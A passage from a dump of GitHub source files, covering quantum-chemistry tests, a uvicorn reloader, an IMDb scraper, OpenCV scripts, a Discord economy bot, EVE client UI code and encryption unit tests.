-> ROOT 7 EXCITATION ENERGY - A1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 7 ext\"\n )\n assert compare_values(\n root7_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 7 TOTAL ENERGY - A1 
SYMMETRY\"), 6, \"EOM-CCSD 0 ->7 total\"\n )\n assert compare_values(\n root8_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 8 EXCITATION ENERGY - A2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 8 ext\"\n )\n assert compare_values(\n root8_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 8 TOTAL ENERGY - A2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 8 total\"\n )\n assert compare_values(\n root9_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 9 EXCITATION ENERGY - B1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 9 ext\"\n )\n assert compare_values(\n root9_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 9 TOTAL ENERGY - B1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 9 total\"\n )\n assert compare_values(\n root10_exc,\n qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 10 EXCITATION ENERGY - A2 SYMMETRY\"),\n 6,\n \"EOM-CCSD 0 -> 10 ext\",\n )\n assert compare_values(\n root10_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 10 TOTAL ENERGY - A2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 10 total\"\n )\n assert compare_values(\n root11_exc,\n qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 11 EXCITATION ENERGY - B1 SYMMETRY\"),\n 6,\n \"EOM-CCSD 0 -> 11 ext\",\n )\n assert compare_values(\n root11_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 11 TOTAL ENERGY - B1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 11 total\"\n )\n assert compare_values(\n root12_exc,\n qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 12 EXCITATION ENERGY - B2 SYMMETRY\"),\n 6,\n \"EOM-CCSD 0 -> 12 ext\",\n )\n assert compare_values(\n root12_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 12 TOTAL ENERGY - B2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 12 total\"\n )\n\n\n@using_nwchem\ndef test_1_eomccsd():\n h2o = qcdb.set_molecule(\n \"\"\"\n O 0.000000000000 0.000000000000 -0.123909374404\n H 0.000000000000 1.429936611037 0.983265845431\n H 0.000000000000 -1.429936611037 0.983265845431\n \"\"\"\n )\n\n qcdb.set_options(\n {\n \"basis\": \"6-31g*\",\n \"memory\": \"1500 mb\",\n \"scf__e_convergence\": 1.0e-10,\n #'nwchem_memory' : '1500 mb',\n #'nwchem_memory' : '[total, 1500, stack, 400, heap, 400, global, 700, mb]', #The way nwchem speak for memory may need to change\n #'nwchem_stack_memory' : '400 mb',\n #'nwchem_heap_memory' : '400 mb',\n #'nwchem_global_memory' : '700 mb',\n \"nwchem_scf__thresh\": 1.0e-10,\n \"nwchem_scf__tol2e\": 1.0e-10,\n \"nwchem_scf__rhf\": True,\n \"qc_module\": \"tce\",\n \"nwchem_tce__ccsd\": True,\n \"nwchem_tce__nroots\": 12,\n }\n )\n print(\"Testing EOM-CCSD...\")\n val = qcdb.energy(\"nwc-eom-ccsd\")\n check_eomccsd(val)\n","repo_name":"qcdb/qcdb","sub_path":"qcdb/tests/nwchem_tests/wip_test_eom_ccsd_h2o.py","file_name":"wip_test_eom_ccsd_h2o.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"3424148019","text":"import logging\nimport os\nimport re\nfrom pathlib import Path\nfrom socket import socket\nfrom typing import TYPE_CHECKING, Callable, List, Optional\n\nfrom watchgod import DefaultWatcher\n\nfrom uvicorn.config import Config\nfrom uvicorn.supervisors.basereload import BaseReload\n\nlogger = logging.getLogger(\"uvicorn.error\")\n\nif TYPE_CHECKING:\n DirEntry = os.DirEntry[str]\n\n\nclass CustomWatcher(DefaultWatcher):\n ignore_dotted_file_regex = r\"^\\/?(?:\\w+\\/)*(\\.\\w+)\"\n ignored: List[str] = []\n\n def __init__(self, root_path: str) -> None:\n for t in self.ignored_file_regexes:\n self.ignored.append(t)\n self.ignored.append(self.ignore_dotted_file_regex)\n self._ignored = tuple(re.compile(r) for r in self.ignored)\n super().__init__(root_path)\n\n def should_watch_file(self, entry: 
\"DirEntry\") -> bool:\n return not any(r.search(entry.name) for r in self._ignored)\n\n\nclass WatchGodReload(BaseReload):\n def __init__(\n self,\n config: Config,\n target: Callable[[Optional[List[socket]]], None],\n sockets: List[socket],\n ) -> None:\n super().__init__(config, target, sockets)\n self.reloader_name = \"watchgod\"\n self.watchers = []\n watch_dirs = {\n Path(watch_dir).resolve()\n for watch_dir in self.config.reload_dirs\n if Path(watch_dir).is_dir()\n }\n watch_dirs_set = set(watch_dirs)\n\n # remove directories that already have a parent watched, so that we don't have\n # duplicated change events\n for watch_dir in watch_dirs:\n for compare_dir in watch_dirs:\n if compare_dir is watch_dir:\n continue\n\n if compare_dir in watch_dir.parents:\n watch_dirs_set.remove(watch_dir)\n\n self.watch_dir_set = watch_dirs_set\n for w in watch_dirs_set:\n self.watchers.append(CustomWatcher(str(w)))\n\n def should_restart(self) -> bool:\n for watcher in self.watchers:\n change = watcher.check()\n if change != set():\n message = \"WatchGodReload detected file change in '%s'. Reloading...\"\n logger.warning(message, [c[1] for c in change])\n return True\n\n return False\n","repo_name":"Operation-Falcon/Attacksurfacemanagement","sub_path":"notebook/lib/python3.9/site-packages/uvicorn/supervisors/watchgodreload.py","file_name":"watchgodreload.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"69996190244","text":"import shutil\r\nimport sqlite3\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup as soup # HTML data structure\r\nfrom urllib.request import urlopen as uReq # Web client\r\n\r\n\r\n\r\npage_url = \"https://www.imdb.com/list/ls002913270/\"\r\n\r\n\r\n\r\n\r\nuClient = uReq(page_url)\r\n\r\npage_soup = soup(uClient.read(), \"html.parser\")\r\nuClient.close()\r\n\r\ncontainers = page_soup.findAll(\"div\", {\"class\": \"lister-item mode-detail\"})\r\nout_filename = \"graphics_cards.csv\"\r\n#headers = \"Personality Traits of Celebrities\\n\"\r\n\r\nconn = sqlite3.connect(r\"C:\\Users\\hp-p\\PycharmProjects\\beautifulsoup\\bollywood.db\")\r\ncursor = conn.cursor()\r\ncursor.execute(\"\"\"\r\nCREATE TABLE IF NOT EXISTS bollywood_tb \r\n(name TEXT,desc TEXT, image BLOB)\"\"\")\r\n\r\n\r\nj = 0\r\nfor container in containers:\r\n div_img = container.select('div', {\"class\": \"lister-item-image\"})\r\n image_tag = div_img[0].a.img\r\n image = None\r\n try:\r\n imgLink = image_tag.get('src')\r\n ext = imgLink[imgLink.rindex('.'):]\r\n if ext.startswith(\".png\"):\r\n ext = \".png\"\r\n elif ext.startswith(\".jpeg\"):\r\n ext = \".jpeg\"\r\n elif ext.startswith(\".jpg\"):\r\n ext = \".jpg\"\r\n elif ext.startswith(\".svg\"):\r\n ext = \".svg\"\r\n\r\n filen = str(j) + ext\r\n res = requests.get(imgLink, stream=True)\r\n\r\n with open(filen, \"wb\") as file:\r\n shutil.copyfileobj(res.raw, file)\r\n with open(filen, \"rb\") as file:\r\n image = file.read()\r\n except Exception as e:\r\n print(e)\r\n div = container.select('div', {\"class\": \"lister-item-content\"})\r\n name = div[1].select('a')[0].text\r\n content = div[1].select('p')[1].text\r\n try:\r\n cursor.execute(\"\"\" INSERT INTO bollywood_tb \r\n (name, desc, image) VALUES (?,?,?)\"\"\", (name, content, image))\r\n except:\r\n print('err')\r\n\r\n 
j+=1\r\n\r\nconn.commit()\r\ncursor.close()\r\nconn.close()","repo_name":"BlackHawk1809/crawl-and-scrap-data-using-python","sub_path":"extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44141330243","text":"\n#!/usr/bin/env python\n# coding: utf-8\n\nimport cv2 \nimport numpy as np\nimport sys\n#from matplotlib import pyplot as plt \ndef teste(testeimg):\n image = cv2.imread(testeimg) \n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) \n\n ret, thresh = cv2.threshold(gray, 0, 255, \n cv2.THRESH_BINARY_INV +\n cv2.THRESH_OTSU) \n cv2.imshow('image', thresh) \n\n kernel = np.ones((3, 3), np.uint8) \n closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, \n kernel, iterations = 2) \n bg = cv2.dilate(closing, kernel, iterations = 1) \n dist_transform = cv2.distanceTransform(closing, cv2.DIST_L2, 0) \n ret, fg = cv2.threshold(dist_transform, 0.02\n * dist_transform.max(), 255, 0) \n\n cv2.imshow('image2', fg) \n\n cv2.waitKey(0)\n","repo_name":"TiagoMilani/Projeto---Segmenta-o-de-objetos-em-imagens","sub_path":"BeW.py","file_name":"BeW.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"33648057189","text":"#deprecated by mouseoutputstack.py #\n\nfrom config import tap_timings\nfrom sendusbevents import SendUsbEvents\n\ndef check_single_tap_movement(cts):\n cts2 = cts.last_touchpad_state\n if (cts2 != None) \\\n and (cts.number_of_active_touch == 1) \\\n and (cts2.number_of_active_touch == 1) \\\n and (cts.tap_chain[0][0] == 1):\n time_delta = 1000*(cts.timestamp - cts.tap_chain[0][1])\n if time_delta > tap_timings[1]:\n fp1 = next(fp for fp in cts.slots if fp.touch==1)\n fp2 = next(fp for fp in cts2.slots if fp.touch==1)\n delx = fp1.abs_x - fp2.abs_x\n dely = fp1.abs_y - fp2.abs_y\n #return {'type':'single_movement','x':delx,'y':dely}\n return SendUsbEvents.move_mouse_queue_object(delx,dely)\n #print(\"Single Tap Movement:X %d,Y %d\"%(delx,dely))\n #Make sure that the number of touches is the same as it was\n\n \n\n\n \n","repo_name":"pragun/mouse-daw-controller","sub_path":"python-evdev-serial-relay/singletapmovement.py","file_name":"singletapmovement.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18781818006","text":"from module.jsonl import JsonLoader\nfrom discord.ext import commands\nclass Economy:\n def __init__(self, user_id):\n self.user_id=str(user_id)\n self.open_account()\n \n @property\n def economy(self):\n return JsonLoader(\"/home/container/jsonf/economy.json\")\n \n def open_account(self):\n cont=self.economy.cont\n if cont.get(self.user_id, None) is None:\n cont[self.user_id]={\"cash\":0, \"bank\":0}\n self.economy.edit(cont)\n \n def get(self, info=None):\n if info is None:\n return self.economy.cont[self.user_id]\n else:\n return self.economy.cont[self.user_id][info]\n \n def edit(self, cash=0, bank=0):\n cont=self.economy.cont\n rcash, rbank=tuple(self.get().values())\n if cash<0 and rcash<-cash:\n raise CashCrisis\n if bank<0 and rbank<-bank:\n raise BankCrisis\n cont[self.user_id]={\n 'cash':rcash+cash,\n 'bank':rbank+bank\n }\n self.economy.edit(cont)\n\ndef Excption(message):\n class E(Exception):\n def __init__(self):\n super().__init__(message)\n return E\n \nBankCrisis=Excption(\"Bank 
Crisis\")\nCashCrisis=Excption(\"Cash Crisis\")\nclass AmountNotNumeric(Exception):\n def __init__(self):\n super().__init__(\"Amount Not Numeric\")\n\ndef AmtCnv(_type):\n class AmountConverter(commands.Converter):\n \n async def convert(self, ctx, amount):\n if amount in (\"all\", \"max\"):\n eco=Economy(ctx.author.id)\n amount=eco.get(_type)\n elif not amount.isnumeric():\n await ctx.send(\"You need to enter valid amount\")\n return False\n return int(amount)\n return AmountConverter\n \nBAmountConverter=AmtCnv('bank')\nCAmountConverter=AmtCnv('cash')\n","repo_name":"ServerBoys/NoUse_Bot","sub_path":"module/economy_c.py","file_name":"economy_c.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37020120141","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\shared\\skins\\controller.py\r\nfrom itertoolsext import first\r\nimport locks\r\nimport uthread\r\nimport signals\r\n\r\nclass SkinPanelAdapter(object):\r\n\r\n def ApplySkin(self, controller, itemID, skin):\r\n uthread.new(self._ApplySkinThread, controller, itemID, skin)\r\n\r\n def _ApplySkinThread(self, controller, itemID, skin):\r\n try:\r\n sm.GetService('skinSvc').ApplySkin2(itemID, skin)\r\n except UserError as e:\r\n if e.msg != 'SkinAlreadyApplied':\r\n controller.OnApplySkinFailed(itemID, skin)\r\n raise\r\n skinID = skin.skinID if skin is not None else None\r\n controller.OnActiveShipSkinChange(itemID, skinID)\r\n except Exception:\r\n controller.OnApplySkinFailed(itemID, skin)\r\n raise\r\n\r\n def GetAppliedSkin(self, itemID, typeID = None):\r\n return sm.GetService('skinSvc').GetAppliedSkin(session.charid, itemID, typeID)\r\n\r\n def GetSkins(self, typeID):\r\n return sm.GetService('skinSvc').GetSkins(typeID)\r\n\r\n def GetTypesForSkin(self, skinID):\r\n skin = sm.GetService('skinSvc').static.GetSkinByID(skinID)\r\n return skin.types\r\n\r\n def RegisterNotify(self, controller):\r\n sm.RegisterNotify(controller)\r\n\r\n def UnregisterNotify(self, controller):\r\n sm.UnregisterNotify(controller)\r\n\r\n\r\nclass SkinPanelController(object):\r\n __notifyevents__ = ['OnSkinLicenseActivated']\r\n\r\n def __init__(self, typeID, adapter = None):\r\n self._adapter = adapter or SkinPanelAdapter()\r\n self._lock = locks.Lock()\r\n self.Reset(typeID)\r\n self.onChange = signals.Signal()\r\n self.onSkinsChange = signals.Signal()\r\n self.onSkinsChange.connect(self.onChange)\r\n self._adapter.RegisterNotify(self)\r\n\r\n def Close(self):\r\n self._adapter.UnregisterNotify(self)\r\n self.onSkinsChange.clear()\r\n self.onChange.clear()\r\n\r\n def Reset(self, typeID):\r\n self._typeID = typeID\r\n self._applied = None\r\n self._previewed = None\r\n self._pending = None\r\n self._skins = None\r\n\r\n @property\r\n def typeID(self):\r\n return self._typeID\r\n\r\n @typeID.setter\r\n def typeID(self, newTypeID):\r\n with self._lock:\r\n self.Reset(newTypeID)\r\n self.onSkinsChange()\r\n\r\n @property\r\n def applied(self):\r\n return self._applied\r\n\r\n @property\r\n def previewed(self):\r\n return self._previewed\r\n\r\n @property\r\n def pending(self):\r\n return self._pending\r\n\r\n @property\r\n def skins(self):\r\n if self._skins is None:\r\n self._skins = self._adapter.GetSkins(self._typeID)\r\n return self._skins\r\n\r\n def PickSkin(self, skin):\r\n with self._lock:\r\n currentID = self._previewed.materialID if self._previewed is not None else 
None\r\n pickedID = skin.materialID if skin is not None else None\r\n if currentID == pickedID:\r\n skin = None\r\n self._previewed = skin\r\n self.onChange()\r\n\r\n def OnSkinLicenseActivated(self, skinID):\r\n with self._lock:\r\n types = self._adapter.GetTypesForSkin(skinID)\r\n if self._typeID not in types:\r\n return\r\n self._skins = None\r\n self._UpdateActivatedSkin(skinID)\r\n self.onSkinsChange()\r\n\r\n def _UpdateActivatedSkin(self, skinID):\r\n if self._previewed is None:\r\n return\r\n try:\r\n skin = first(self.skins, lambda s: s.skinID == skinID)\r\n if skin.materialID == self._previewed.materialID:\r\n self._previewed = skin\r\n except StopIteration:\r\n pass\r\n\r\n\r\nclass SkinNotAvailableForType(Exception):\r\n pass\r\n\r\n\r\nclass FittingSkinPanelController(SkinPanelController):\r\n __notifyevents__ = SkinPanelController.__notifyevents__ + ['OnActiveShipSkinChange']\r\n\r\n def __init__(self, fitting, adapter = None):\r\n self._fitting = fitting\r\n super(FittingSkinPanelController, self).__init__(typeID=fitting.GetTypeID(), adapter=adapter)\r\n self._UpdateFittingMaterial()\r\n self.onChange.connect(self._UpdateFittingMaterial)\r\n self._fitting.on_new_itemID.connect(self.OnNewItemID)\r\n\r\n def Close(self):\r\n super(FittingSkinPanelController, self).Close()\r\n self._fitting.on_new_itemID.disconnect(self.OnNewItemID)\r\n\r\n @property\r\n def itemID(self):\r\n return self._itemID\r\n\r\n def Reset(self, typeID):\r\n super(FittingSkinPanelController, self).Reset(typeID)\r\n self._itemID = self._fitting.GetItemID()\r\n self._applied = self._adapter.GetAppliedSkin(self._itemID, typeID)\r\n\r\n def PickSkin(self, skin):\r\n itemID = self.itemID\r\n with self._lock:\r\n if skin is not None and skin not in self.skins:\r\n raise SkinNotAvailableForType('%s not found in %s' % (skin, self.skins))\r\n if skin is None:\r\n self._ResetPick(itemID)\r\n elif skin.licensed:\r\n self._PickLicensedSkin(skin, itemID)\r\n else:\r\n self._PickUnlicensedSkin(skin)\r\n\r\n def _ResetPick(self, itemID):\r\n if all((s is None for s in (self._applied, self._pending, self._previewed))):\r\n return\r\n self._applied = None\r\n self._pending = None\r\n self._previewed = None\r\n self._adapter.ApplySkin(self, itemID, None)\r\n self.onChange()\r\n\r\n def _PickLicensedSkin(self, skin, itemID):\r\n if self._applied == skin or self._pending == skin:\r\n skin = None\r\n self._pending = skin\r\n self._applied = None\r\n if skin is not None:\r\n self._previewed = None\r\n self._adapter.ApplySkin(self, itemID, skin)\r\n self.onChange()\r\n\r\n def _PickUnlicensedSkin(self, skin):\r\n if self._previewed == skin:\r\n self._previewed = None\r\n else:\r\n self._previewed = skin\r\n self.onChange()\r\n\r\n def OnActiveShipSkinChange(self, itemID, skinID):\r\n if itemID != self.itemID:\r\n return\r\n with self._lock:\r\n if skinID is None and self._applied is None:\r\n return\r\n if skinID is None:\r\n skin = None\r\n else:\r\n try:\r\n skin = first(self.skins, lambda s: s.skinID == skinID)\r\n except StopIteration:\r\n return\r\n\r\n if self._applied == skin:\r\n return\r\n if self._pending and self._pending.skinID == skin.skinID:\r\n self._pending = None\r\n self._applied = skin\r\n self.onChange()\r\n\r\n def OnNewItemID(self):\r\n self.typeID = self._fitting.GetTypeID()\r\n\r\n def OnApplySkinFailed(self, itemID, skin):\r\n if itemID != self.itemID:\r\n return\r\n with self._lock:\r\n if self._pending == skin:\r\n self._pending = None\r\n self._applied = self._adapter.GetAppliedSkin(itemID)\r\n 
self.onChange()\r\n\r\n def _UpdateActivatedSkin(self, skinID):\r\n if self._applied is not None and self._applied.skinID == skinID:\r\n self._applied = None\r\n if self._pending is not None and self._pending.skinID == skinID:\r\n self._pending = None\r\n if self._previewed is not None:\r\n try:\r\n skin = first(self.skins, lambda s: s.skinID == skinID)\r\n if self._previewed.materialID == skin.materialID:\r\n self._previewed = None\r\n except StopIteration:\r\n pass\r\n\r\n def _UpdateFittingMaterial(self):\r\n if self._previewed:\r\n materialSetID = self._previewed.materialSetID\r\n elif self._pending:\r\n materialSetID = self._pending.materialSetID\r\n elif self._applied:\r\n materialSetID = self._applied.materialSetID\r\n else:\r\n materialSetID = None\r\n self._fitting.SetSkinMaterialSetID(materialSetID)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/eve/client/script/ui/shared/skins/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1459958526","text":"from google.apputils import app\nimport logging\nfrom google.apputils import basetest as googletest\n\nimport ebq_crypto as ecrypto\n\n_KEY1 = '0123456789abcdef'\n_PLAINTEXT1 = 'this is test string one'\n\n\nclass ProbabilisticCiphertTest(googletest.TestCase):\n\n def setUp(self):\n \"\"\"Run once for each test in the class.\"\"\"\n self.cipher = ecrypto.ProbabilisticCipher(_KEY1)\n\n def testProbabilisticEncryptDecryptUnicodeString(self):\n logging.debug('Running testProbabilisticEncryptDecryptUtf8String method.')\n # test success with different plaintexts\n for plaintext in (u'22', u'this is test string one', u'-1.3', u'5545',\n u\"\"\"this is a longer test string that should go on for\n more than two AES blocks or perhaps many more of them\n also.\"\"\"):\n ciphertext = self.cipher.Encrypt(plaintext)\n self.assertEqual(plaintext, self.cipher.Decrypt(ciphertext))\n # non string type should raise an error.\n try:\n self.cipher.Encrypt(22)\n self.fail()\n except ValueError:\n pass # success\n\n def testDecryptWhenRaw(self):\n \"\"\"Test Decrypt() in raw mode while passing invalid utf-8 bytes.\"\"\"\n invalid_utf8 = '\\xf0\\xf0\\xf0'\n ciphertext = self.cipher.Encrypt(invalid_utf8)\n plaintext = self.cipher.Decrypt(ciphertext, raw=True)\n self.assertEqual(invalid_utf8, plaintext)\n\n def testDecryptWhenNotRaw(self):\n \"\"\"Test Decrypt() when not in raw mode, which is the default.\"\"\"\n invalid_utf8 = '\\xf0\\xf0\\xf0'\n ciphertext = self.cipher.Encrypt(invalid_utf8)\n # although these bytes were encrypted and returned as ciphertext,\n # attempting to decrypt them (works) and transform them back to\n # unicode via utf-8 decode (raw=False) should fail.\n self.assertRaises(\n UnicodeDecodeError, self.cipher.Decrypt, ciphertext, raw=False)\n\n\nclass PseudonymCiphertTest(googletest.TestCase):\n\n def setUp(self):\n \"\"\"Run once for each test in the class.\"\"\"\n self.cipher = ecrypto.PseudonymCipher(_KEY1)\n\n def testPseudonymEncryptDecryptUnicodeString(self):\n logging.debug('Running testPseudonymEncryptDecryptUtf8String method.')\n # test success with different plaintexts\n for plaintext in (u'22', u'this is test string one', u'-1.3', u'5545',\n u\"\"\"this is a longer test string that should go on for\n more than two AES blocks or perhaps many more of them\n also.\"\"\"):\n ciphertext = self.cipher.Encrypt(plaintext)\n self.assertEqual(plaintext, 
self.cipher.Decrypt(ciphertext))\n # non string type should raise an error.\n try:\n self.cipher.Encrypt(22)\n self.fail()\n except ValueError:\n pass # success\n\n\ndef _GetRandForTesting(size):\n # return some constant of appropriate size\n return size * '1'\n\n\nclass HomomorphicIntCiphertTest(googletest.TestCase):\n\n def setUp(self):\n \"\"\"Run once for each test in the class.\"\"\"\n self.cipher = ecrypto.HomomorphicIntCipher(_KEY1)\n\n def testHomomorphicEncryptIntDecryptInt(self):\n logging.debug('Running testHomomorphicEncryptIntDecryptInt method.')\n # test success with different plaintexts\n for plaintext in (2, 5, 55, 333333333, 44444444444):\n ciphertext = self.cipher.Encrypt(plaintext)\n self.assertEqual(plaintext, self.cipher.Decrypt(ciphertext))\n # non int/long type should raise an error.\n try:\n self.cipher.Encrypt('22')\n self.fail()\n except ValueError:\n pass # success\n try:\n self.cipher.Encrypt(22222222222222222222222)\n self.fail()\n except ValueError:\n pass # success\n\n\nclass HomomorphicFloatCipherTest(googletest.TestCase):\n\n def setUp(self):\n \"\"\"Run once for each test in the class.\"\"\"\n self.cipher = ecrypto.HomomorphicFloatCipher(_KEY1)\n\n def testHomomorphicEncryptFloatDecryptFloat(self):\n logging.debug('Running testHomomorphicEncryptFloatDecryptFloat method.')\n # test success with different plaintexts\n for plaintext in (1.22, 0.4565, 55.45, 33.3333333, 444444444.44):\n ciphertext = self.cipher.Encrypt(plaintext)\n self.assertEqual(plaintext, self.cipher.Decrypt(ciphertext))\n # encrypting a too large float should raise an error.\n try:\n self.cipher.Encrypt(1.0*2**400)\n self.fail()\n except ValueError:\n pass # success\n # non int/long type should raise an error.\n try:\n self.cipher.Encrypt('22')\n self.fail()\n except ValueError:\n pass # success\n\n\nclass StringHashTest(googletest.TestCase):\n\n def setUp(self):\n \"\"\"Run once for each test in the class.\"\"\"\n self.hasher = ecrypto.StringHash(_KEY1, 8, 'sha1')\n self.fieldname = u'Description'\n\n def testGetStringKeyHash(self):\n logging.debug('Running testGetStringKeyHash method.')\n hash1 = self.hasher.GetStringKeyHash(self.fieldname, u'school')\n self.assertEqual(12, len(hash1)) # expanded to 8 * 4/3 due to base64\n # check 2nd call to hash gives same output\n hash2 = self.hasher.GetStringKeyHash(self.fieldname, u'school')\n self.assertEqual(hash1, hash2)\n # check different input gives a different hash\n hash3 = self.hasher.GetStringKeyHash(self.fieldname, u'not school')\n self.assertNotEqual(hash1, hash3)\n # check that hash output length can be specified on digest call\n hash4 = self.hasher.GetStringKeyHash(self.fieldname, u'school',\n output_len=33)\n # -- 33*4/3 rounded up to a multiple of 4 for base64 encoding\n self.assertEqual(44, len(hash4))\n # check that another hash function can be specified on digest call\n hash5 = self.hasher.GetStringKeyHash(self.fieldname, u'school',\n output_len=33, hashfunc='sha256')\n self.assertNotEqual(hash4, hash5)\n # check that another outputlen and hashfunc can be set through constructor\n hasher6 = ecrypto.StringHash(_KEY1, 33, 'sha256')\n self.assertEqual(hash5, hasher6.GetStringKeyHash(self.fieldname, u'school'))\n\n def testGetHashessForWordSubsequencesWithIv(self):\n logging.debug('Running testGetHashesForWordSubsequencesWithIv method.')\n text = u'The quick brown fox jumps over the lazy dog'\n hashes1 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text, random_permute=False, rand_gen=_GetRandForTesting)\n # 
hashes1 has 36 words because text has 9 words and there are 35 word\n # subsequences of length 5 or less, and one extra due to pre-pended iv.\n self.assertEqual(36, len(hashes1.split()))\n # For regression testing, below is the expected string.\n self.assertEqual('MTExMTExMTExMTExMTExMQ== r+LnPgD7hZQ= xSqjeTLry4M= '\n 'Nsx9q20oJFk= /xu7ZfpL2B0= +kzAzlhR4Q4= sOKsrKXhkCQ= '\n '8qmxrO4cbSg= 0zvX/8lk2f4= htApcCWILMg= sKK2mV5HpXY= '\n '7pCfT7322NU= j33+LJhZFug= IP1X3g/lPDU= UtP0wX/xX4E= '\n '3a127xbQ5Hg= Kc5wG5S71ac= crqNunt/kdY= y2cx1LMP1Pk= '\n 'GU4VGtrwcmI= QdgK8S91ZIw= wr8+BHzGCzc= KAez7MjDGVo= '\n 'nzHEdXrWRPU= X/zhUoGgoss= 9vOSQpX3CZk= NpU2fSVRlKw= '\n 'FCIrv3nzunI= jrCH4Takl+I= JSs5E/K2Wr8= r+LnPgD7hZQ= '\n 'Xvb827F9rzw= htitZIrHc4w= e+6DbqjmqFU= c2xxyrQH3dU= '\n 'GYmYmk5pI1g=', hashes1)\n # check 2nd call to hash gives same output\n hashes2 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text, random_permute=False, rand_gen=_GetRandForTesting)\n self.assertEqual(hashes1, hashes2)\n # check different smaller input (by one word) gives a different hash\n hashes3 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text[3:], random_permute=False,\n rand_gen=_GetRandForTesting)\n self.assertNotEqual(hashes1, hashes3)\n self.assertEqual(31, len(hashes3.split())) # one extra for IV\n # check that hash output length can be specified on digest call\n # - for 16 bytes length, the b64 encode turns it into 24 bytes.\n hashes4 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text[3:], output_len=16, random_permute=False,\n rand_gen=_GetRandForTesting)\n self.assertEqual(24, len(hashes4.split()[1])) # skip 0th which is IV\n # check that another hash function can be specified on digest call\n hashes5 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text[3:], hashfunc='sha256', random_permute=False,\n rand_gen=_GetRandForTesting)\n self.assertNotEqual(hashes1, hashes5)\n # check that another max_sequence_len can be set\n hashes6 = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text, max_sequence_len=3, random_permute=False)\n self.assertEqual(25, len(hashes6.split())) # one extra for IV\n\n # check hashing of string with punctuations marks.\n # - As in hashes3 above we also skip the first word, the result should be\n # same as hashes3.\n unclean_text = (u'The; quick,,,, BROWN''!\\\"#%&\\'()*,/?@[]{}--___, fox ' +\n u'jUmps. 
over the lazy dog...')\n hashes_unclean = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, unclean_text[3:], random_permute=False,\n rand_gen=_GetRandForTesting)\n self.assertEqual(hashes3, hashes_unclean)\n\n # check hashing with a different separator\n text_slash = u'http://www.google.com/johndoe-inbox'\n hashes_slash = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, text_slash, random_permute=False,\n rand_gen=_GetRandForTesting, separator='/')\n self.assertEqual(7, len(hashes_slash.split())) # one extra for IV\n self.assertEqual('MTExMTExMTExMTExMTExMQ== FvAl46zVC9s= tyI89/YsFnI= '\n 'Xx51CZp6Nks= PkkH/6bqWnI= 32+DPg79MK8= 3lESAvKjz84=',\n hashes_slash)\n\n # check empty text, results in just the iv.\n empty_text = u' ;,.'\n hashes_empty = self.hasher.GetHashesForWordSubsequencesWithIv(\n self.fieldname, empty_text, random_permute=False,\n rand_gen=_GetRandForTesting)\n # - expect base64 encoding of IV of 16 ones.\n self.assertEqual('MTExMTExMTExMTExMTExMQ==', hashes_empty)\n\n\ndef main(_):\n googletest.main()\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"google/encrypted-bigquery-client","sub_path":"src/ebq_crypto_test.py","file_name":"ebq_crypto_test.py","file_ext":"py","file_size_in_byte":10252,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"52"} +{"seq_id":"4919591559","text":"# USAGE\n# python find_waldo.py --puzzle puzzle.png --waldo waldo.png\n\n# import the necessary packages\nimport numpy as np\nimport imutils\nimport cv2\n\n# load the puzzle and waldo images\npuzzle = cv2.imread(\"puzzle.png\")\nwaldo = cv2.imread(\"waldo.png\")\n(waldoHeight, waldoWidth) = waldo.shape[:2]\n\n# find the waldo in the puzzle\nresult = cv2.matchTemplate(puzzle, waldo, cv2.TM_CCOEFF)\n(_, _, minLoc, maxLoc) = cv2.minMaxLoc(result)\n\n# grab the bounding box of waldo and extract him from\n# the 